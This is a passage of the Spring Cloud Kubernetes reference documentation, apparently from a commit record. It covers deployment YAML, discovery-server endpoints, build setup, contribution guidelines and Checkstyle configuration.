spring-cloud-kubernetes-configserver\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n spec:\n serviceAccount: spring-cloud-kubernetes-configserver\n containers:\n - name: spring-cloud-kubernetes-configserver\n image: springcloud\/spring-cloud-kubernetes-configserver\n imagePullPolicy: IfNotPresent\n env:\n - name: SPRING_PROFILES_INCLUDE\n value: \"kubernetes\"\n readinessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8888\n\n----\n====\n\n[#spring-cloud-kubernetes-discoveryserver]\n## Spring Cloud Kubernetes Discovery Server\n\nThe Spring Cloud Kubernetes Discovery Server provides HTTP endpoints apps can use to gather information\nabout services available within a Kubernetes cluster. The Spring Cloud Kubernetes Discovery Server\ncan be used by apps using the `spring-cloud-starter-kubernetes-discoveryclient` to provide data to\nthe `DiscoveryClient` implementation provided by that starter.\n\n### Permissions\nThe Spring Cloud Discovery Server uses\nthe Kubernetes API server to get data about Service and Endpoint resources, so it needs `list`, `watch`, and\n`get` permissions to use those endpoints. See the sample Kubernetes deployment YAML below for an\nexample of how to configure the Service Account on Kubernetes.\n\n\n### Endpoints\nThere are three endpoints exposed by the server.\n\n#### `\/apps`\n\nA `GET` request sent to `\/apps` will return a JSON array of available services. Each item contains\nthe name of the Kubernetes service and service instance information. 
Below is a sample response.\n\n====\n[source,json]\n----\n[\n {\n \"name\":\"spring-cloud-kubernetes-discoveryserver\",\n \"serviceInstances\":[\n {\n \"instanceId\":\"836a2f25-daee-4af2-a1be-aab9ce2b938f\",\n \"serviceId\":\"spring-cloud-kubernetes-discoveryserver\",\n \"host\":\"10.244.1.6\",\n \"port\":8761,\n \"uri\":\"http:\/\/10.244.1.6:8761\",\n \"secure\":false,\n \"metadata\":{\n \"app\":\"spring-cloud-kubernetes-discoveryserver\",\n \"kubectl.kubernetes.io\/last-applied-configuration\":\"{\\\"apiVersion\\\":\\\"v1\\\",\\\"kind\\\":\\\"Service\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"labels\\\":{\\\"app\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\"},\\\"name\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\",\\\"namespace\\\":\\\"default\\\"},\\\"spec\\\":{\\\"ports\\\":[{\\\"name\\\":\\\"http\\\",\\\"port\\\":80,\\\"targetPort\\\":8761}],\\\"selector\\\":{\\\"app\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\"},\\\"type\\\":\\\"ClusterIP\\\"}}\\n\",\n \"http\":\"8761\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n ]\n },\n {\n \"name\":\"kubernetes\",\n \"serviceInstances\":[\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n ]\n }\n]\n----\n====\n\n#### `\/app\/{name}`\n\nA `GET` request to `\/app\/{name}` can be used to get instance data for all instances of a given\nservice. Below is a sample response when a `GET` request is made to `\/app\/kubernetes`.\n\n====\n[source,json]\n----\n[\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n]\n----\n====\n\n#### `\/app\/{name}\/{instanceid}`\n\nA `GET` request made to `\/app\/{name}\/{instanceid}` will return the instance data for a specific\ninstance of a given service. 
Below is a sample response when a `GET` request is made to `\/app\/kubernetes\/1234`.\n\n====\n[source,json]\n----\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n----\n====\n\n### Deployment YAML\n\nAn image of the Spring Cloud Discovery Server is hosted on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-discoveryserver[Docker Hub].\n\nBelow is a sample deployment YAML you can use to deploy the Spring Cloud Kubernetes Discovery Server to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver\n spec:\n ports:\n - name: http\n port: 80\n targetPort: 8761\n selector:\n app: spring-cloud-kubernetes-discoveryserver\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-discoveryserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"services\", \"endpoints\"]\n verbs: [\"get\", \"list\", \"watch\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-discoveryserver-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-discoveryserver\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n spec:\n serviceAccount: spring-cloud-kubernetes-discoveryserver\n containers:\n - name: spring-cloud-kubernetes-discoveryserver\n image: springcloud\/spring-cloud-kubernetes-discoveryserver:3.0.0-SNAPSHOT\n imagePullPolicy: IfNotPresent\n readinessProbe:\n httpGet:\n port: 8761\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8761\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8761\n\n\n----\n====\n\n== Examples\n\nSpring Cloud Kubernetes tries to make it transparent for your applications to consume Kubernetes Native Services by\nfollowing the Spring Cloud interfaces.\n\nIn your applications, you need to add the `spring-cloud-kubernetes-discovery` dependency to your classpath and remove any other dependency that contains a `DiscoveryClient` implementation (that is, a Eureka discovery client).\nThe same applies for `PropertySourceLocator`, where you need to add to the classpath the `spring-cloud-kubernetes-config` and remove any other dependency that contains a `PropertySourceLocator` implementation (that is, a configuration server client).\n\nThe following projects highlight the usage of these dependencies and demonstrate how you can use these libraries from any Spring Boot application:\n\n* https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-examples[Spring Cloud Kubernetes 
Examples]: the ones located inside this repository.\n* Spring Cloud Kubernetes Full Example: Minions and Boss\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-minion[Minion]\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-boss[Boss]\n* Spring Cloud Kubernetes Full Example: https:\/\/github.com\/salaboy\/s1p_docs[SpringOne Platform Tickets Service]\n* https:\/\/github.com\/salaboy\/s1p_gateway[Spring Cloud Gateway with Spring Cloud Kubernetes Discovery and Config]\n* https:\/\/github.com\/salaboy\/showcase-admin-tool[Spring Boot Admin with Spring Cloud Kubernetes Discovery and Config]\n\n== Other Resources\n\nThis section lists other resources, such as presentations (slides) and videos about Spring Cloud Kubernetes.\n\n* https:\/\/salaboy.com\/2018\/09\/27\/the-s1p-experience\/[S1P Spring Cloud on PKS]\n* https:\/\/salaboy.com\/2018\/07\/18\/ljc-july-18-spring-cloud-docker-k8s\/[Spring Cloud, Docker, Kubernetes -> London Java Community July 2018]\n\n\nPlease feel free to submit other resources through pull requests to https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes[this repository].\n\n== Configuration properties\n\nTo see the list of all Kubernetes related configuration properties please check link:appendix.html[the Appendix page].\n\n== Building\n\n:jdkversion: 17\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nThe projects that require middleware (e.g. Redis) for testing generally\nrequire that a local instance of https:\/\/www.docker.com\/get-started[Docker] is installed and running.\n\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttps:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttps:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttps:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin for maven support. 
Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Activate the Spring Maven profile\nSpring Cloud projects require the 'spring' Maven profile to be activated to resolve\nthe spring milestone and snapshot repositories. Use your preferred IDE to set this\nprofile to be active, or you may experience build errors.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the https:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\n:spring-cloud-build-branch: master\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/cla.pivotal.io\/sign\/spring[Contributor License Agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. 
If using IntelliJ, you can use the\n https:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project).\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow https:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).\n\n=== Checkstyle\n\nSpring Cloud Build comes with a set of checkstyle rules. You can find them in the `spring-cloud-build-tools` module. The most notable files under the module are:\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u2514\u2500\u2500 checkstyle.xml <1>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n\n==== Checkstyle configuration\n\nCheckstyle rules are *disabled by default*. To add checkstyle to your project just define the following properties and plugins.\n\n.pom.xml\n----\n<properties>\n<maven-checkstyle-plugin.failsOnError>true<\/maven-checkstyle-plugin.failsOnError> <1>\n <maven-checkstyle-plugin.failsOnViolation>true\n <\/maven-checkstyle-plugin.failsOnViolation> <2>\n <maven-checkstyle-plugin.includeTestSourceDirectory>true\n <\/maven-checkstyle-plugin.includeTestSourceDirectory> <3>\n<\/properties>\n\n<build>\n <plugins>\n <plugin> <4>\n <groupId>io.spring.javaformat<\/groupId>\n <artifactId>spring-javaformat-maven-plugin<\/artifactId>\n <\/plugin>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n\n <reporting>\n <plugins>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n <\/reporting>\n<\/build>\n----\n<1> Fails the build upon Checkstyle errors\n<2> Fails the build upon Checkstyle violations\n<3> Checkstyle also analyzes the test sources\n<4> Add the Spring Java Format plugin that will reformat your code to pass most of the Checkstyle formatting rules\n<5> Add the checkstyle plugin to your build and reporting phases\n\nIf you need to suppress some rules (e.g. line length needs to be longer), then it's enough for you to define a file under `${project.root}\/src\/checkstyle\/checkstyle-suppressions.xml` with your suppressions. 
Example:\n\n.projectRoot\/src\/checkstyle\/checkstyle-suppressions.xml\n----\n<?xml version=\"1.0\"?>\n<!DOCTYPE suppressions PUBLIC\n\t\t\"-\/\/Puppy Crawl\/\/DTD Suppressions 1.1\/\/EN\"\n\t\t\"https:\/\/www.puppycrawl.com\/dtds\/suppressions_1_1.dtd\">\n<suppressions>\n\t<suppress files=\".*ConfigServerApplication\\.java\" checks=\"HideUtilityClassConstructor\"\/>\n\t<suppress files=\".*ConfigClientWatch\\.java\" checks=\"LineLengthCheck\"\/>\n<\/suppressions>\n----\n\nIt's advisable to copy the `${spring-cloud-build.rootFolder}\/.editorconfig` and `${spring-cloud-build.rootFolder}\/.springformat` to your project. That way, some default formatting rules will be applied. You can do so by running this script:\n\n====\n[source,bash]\n----\n$ curl https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/.editorconfig -o .editorconfig\n$ touch .springformat\n----\n====\n\n=== IDE setup\n\n==== IntelliJ IDEA\n\nIn order to set up IntelliJ, you should import our coding conventions and inspection profiles and set up the checkstyle plugin.\nThe following files can be found in the https:\/\/github.com\/spring-cloud\/spring-cloud-build\/tree\/master\/spring-cloud-build-tools[Spring Cloud Build] project.\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle.xml <1>\n \u00a0\u00a0 \u2514\u2500\u2500 intellij\n \u00a0\u00a0 \u00a0\u00a0 \u251c\u2500\u2500 Intellij_Project_Defaults.xml <4>\n \u00a0\u00a0 \u00a0\u00a0 \u2514\u2500\u2500 Intellij_Spring_Boot_Java_Conventions.xml <5>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n<4> Project defaults for IntelliJ that apply most of the Checkstyle rules\n<5> Project style conventions for IntelliJ that apply most of the Checkstyle rules\n\n.Code style\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-code-style.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Code style`. There, click on the icon next to the `Scheme` section. There, click on the `Import Scheme` value and pick the `IntelliJ IDEA code style XML` option. Import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Spring_Boot_Java_Conventions.xml` file.\n\n.Inspection profiles\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-inspections.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Inspections`. There, click on the icon next to the `Profile` section. There, click on `Import Profile` and import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Project_Defaults.xml` file.\n\n.Checkstyle\n\nTo have IntelliJ work with Checkstyle, you have to install the `Checkstyle` plugin. It's advisable to also install the `Assertions2Assertj` plugin to automatically convert JUnit assertions.\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-checkstyle.png[Checkstyle]\n\nGo to `File` -> `Settings` -> `Other settings` -> `Checkstyle`. 
There, click on the `+` icon in the `Configuration file` section. There, you'll have to define where the checkstyle rules should be picked from. In the image above, we've picked the rules from the cloned Spring Cloud Build repository. However, you can point to the Spring Cloud Build's GitHub repository (e.g. for the `checkstyle.xml`: `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle.xml`). We need to provide the following variables:\n\n- `checkstyle.header.file` - please point it to Spring Cloud Build's `spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` URL.\n- `checkstyle.suppressions.file` - default suppressions. Please point it to Spring Cloud Build's `spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` URL.\n- `checkstyle.additional.suppressions.file` - this variable corresponds to suppressions in your local project. E.g. if you're working on `spring-cloud-contract`, point to the `project-root\/src\/checkstyle\/checkstyle-suppressions.xml` file. An example for `spring-cloud-contract` would be: `\/home\/username\/spring-cloud-contract\/src\/checkstyle\/checkstyle-suppressions.xml`.\n\nIMPORTANT: Remember to set the `Scan Scope` to `All sources` since we apply checkstyle rules for production and test sources.\n\n=== Duplicate Finder\n\nSpring Cloud Build brings along the `basepom:duplicate-finder-maven-plugin`, which enables flagging duplicate and conflicting classes and resources on the Java classpath.\n\n==== Duplicate Finder configuration\n\nDuplicate finder is *enabled by default* and will run in the `verify` phase of your Maven build, but it will only take effect in your project if you add the `duplicate-finder-maven-plugin` to the `build` section of the project's `pom.xml`.\n\n.pom.xml\n[source,xml]\n----\n<build>\n <plugins>\n <plugin>\n <groupId>org.basepom.maven<\/groupId>\n <artifactId>duplicate-finder-maven-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n<\/build>\n----\n\nFor other properties, we have set defaults as listed in the https:\/\/github.com\/basepom\/duplicate-finder-maven-plugin\/wiki[plugin documentation].\n\nYou can easily override them by setting the value of the selected property prefixed with `duplicate-finder-maven-plugin`. 
For example, set `duplicate-finder-maven-plugin.skip` to `true` in order to skip duplicates check in your build.\n\nIf you need to add `ignoredClassPatterns` or `ignoredResourcePatterns` to your setup, make sure to add them in the plugin configuration section of your project:\n\n[source,xml]\n----\n<build>\n <plugins>\n <plugin>\n <groupId>org.basepom.maven<\/groupId>\n <artifactId>duplicate-finder-maven-plugin<\/artifactId>\n <configuration>\n <ignoredClassPatterns>\n <ignoredClassPattern>org.joda.time.base.BaseDateTime<\/ignoredClassPattern>\n <ignoredClassPattern>.*module-info<\/ignoredClassPattern>\n <\/ignoredClassPatterns>\n <ignoredResourcePatterns>\n <ignoredResourcePattern>changelog.txt<\/ignoredResourcePattern>\n <\/ignoredResourcePatterns>\n <\/configuration>\n <\/plugin>\n <\/plugins>\n<\/build>\n\n\n----\n\n","old_contents":"\/\/\/\/\nDO NOT EDIT THIS FILE. IT WAS GENERATED.\nManual changes to this file will be lost when it is generated again.\nEdit the files in the src\/main\/asciidoc\/ directory instead.\n\/\/\/\/\n\n\n= Spring Cloud Kubernetes\n:doctype: book\n:idprefix:\n:idseparator: -\n:toc: left\n:toclevels: 4\n:tabsize: 4\n:numbered:\n:sectanchors:\n:sectnums:\n:icons: font\n:hide-uri-scheme:\n:docinfo: shared,private\n\n:sc-ext: java\n:project-full-name: Spring Cloud Kubernetes\n:all: {asterisk}{asterisk}\n\nThis reference guide covers how to use Spring Cloud Kubernetes.\n\n== Why do you need Spring Cloud Kubernetes?\n\nSpring Cloud Kubernetes provides implementations of well known Spring Cloud interfaces allowing developers to build and run Spring Cloud applications on Kubernetes. While this project may be useful to you when building a cloud native application, it is also not a requirement in order to deploy a Spring Boot app on Kubernetes. If you are just getting started in your journey to running your Spring Boot app on Kubernetes you can accomplish a lot with nothing more than a basic Spring Boot app and Kubernetes itself. To learn more, you can get started by reading the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#cloud-deployment-kubernetes[Spring Boot reference documentation for deploying to Kubernetes ] and also working through the workshop material https:\/\/hackmd.io\/@ryanjbaxter\/spring-on-k8s-workshop[Spring and Kubernetes].\n\n== Starters\n\nStarters are convenient dependency descriptors you can include in your\napplication. Include a starter to get the dependencies and Spring Boot\nauto-configuration for a feature set. 
Starters that begin with `spring-cloud-starter-kubernetes-fabric8`\nprovide implementations using the https:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java Client].\nStarters that begin with\n`spring-cloud-starter-kubernetes-client` provide implementations using the https:\/\/github.com\/kubernetes-client\/java[Kubernetes Java Client].\n\n[cols=\"a,d\"]\n|===\n| Starter | Features\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client<\/artifactId>\n<\/dependency>\n----\n| <<DiscoveryClient for Kubernetes,Discovery Client>> implementation that\nresolves service names to Kubernetes Services.\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-config<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-config<\/artifactId>\n<\/dependency>\n----\n| Load application properties from Kubernetes\n<<configmap-propertysource,ConfigMaps>> and <<Secrets PropertySource,Secrets>>.\n<<propertysource-reload,Reload>> application properties when a ConfigMap or\nSecret changes.\n\n| [source,xml]\n.Fabric8 Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-all<\/artifactId>\n<\/dependency>\n----\n\n[source,xml]\n.Kubernetes Client Dependency\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-all<\/artifactId>\n<\/dependency>\n----\n| All Spring Cloud Kubernetes features.\n|===\n\n== DiscoveryClient for Kubernetes\n\nThis project provides an implementation of https:\/\/github.com\/spring-cloud\/spring-cloud-commons\/blob\/master\/spring-cloud-commons\/src\/main\/java\/org\/springframework\/cloud\/client\/discovery\/DiscoveryClient.java[Discovery Client]\nfor https:\/\/kubernetes.io[Kubernetes].\nThis client lets you query Kubernetes endpoints (see https:\/\/kubernetes.io\/docs\/user-guide\/services\/[services]) by name.\nA service is typically exposed by the Kubernetes API server as a collection of endpoints that represent `http` and `https` addresses and that a client can\naccess from a Spring Boot application running as a pod.\n\nThis is something that you get for free by adding the following dependency inside your project:\n\n====\nHTTP Based `DiscoveryClient`\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-discoveryclient<\/artifactId>\n<\/dependency>\n----\n====\n\nNOTE: `spring-cloud-starter-kubernetes-discoveryclient` is designed to be used with the\n<<spring-cloud-kubernetes-discoveryserver, Spring Cloud Kubernetes DiscoveryServer>>.\n\n====\nFabric8 Kubernetes Client\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8<\/artifactId>\n<\/dependency>\n----\n====\n\n====\nKubernetes Java Client\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n 
<artifactId>spring-cloud-starter-kubernetes-client<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable loading of the `DiscoveryClient`, add `@EnableDiscoveryClient` to the corresponding configuration or application class, as the following example shows:\n\n====\n[source,java]\n----\n@SpringBootApplication\n@EnableDiscoveryClient\npublic class Application {\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n}\n----\n====\n\nThen you can inject the client in your code simply by autowiring it, as the following example shows:\n\n====\n[source,java]\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n----\n====\n\nYou can choose to enable `DiscoveryClient` from all namespaces by setting the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nTo discover service endpoint addresses that are not marked as \"ready\" by the Kubernetes API server, you can set the following property in `application.properties` (default: false):\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.include-not-ready-addresses=true\n----\nNOTE: This might be useful when discovering services for monitoring purposes, and would enable inspecting the `\/health` endpoint of not-ready service instances.\n====\n\nIf your service exposes multiple ports, you will need to specify which port the `DiscoveryClient` should use.\nThe `DiscoveryClient` will choose the port using the following logic.\n\n1. If the service has a label `primary-port-name`, it will use the port with the name specified in the label's value.\n2. If no label is present, then the port name specified in `spring.cloud.kubernetes.discovery.primary-port-name` will be used.\n3. If neither of the above is specified, it will use the port named `https`.\n4. If none of the above conditions are met, it will use the port named `http`.\n5. As a last resort, it will pick the first port in the list of ports.\n\nWARNING: The last option may result in non-deterministic behaviour.\nPlease make sure to configure your service and\/or application accordingly.\n\nBy default, all of the ports and their names will be added to the metadata of the `ServiceInstance`.\n\nIf, for any reason, you need to disable the `DiscoveryClient`, you can set the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.enabled=false\n----\n====\n\nSome Spring Cloud components use the `DiscoveryClient` in order to obtain information about the local service instance. For\nthis to work, you need to align the Kubernetes service name with the `spring.application.name` property.\n\nNOTE: `spring.application.name` has no effect on the name registered for the application within Kubernetes.\n\nSpring Cloud Kubernetes can also watch the Kubernetes service catalog for changes and update the\n`DiscoveryClient` implementation accordingly. 
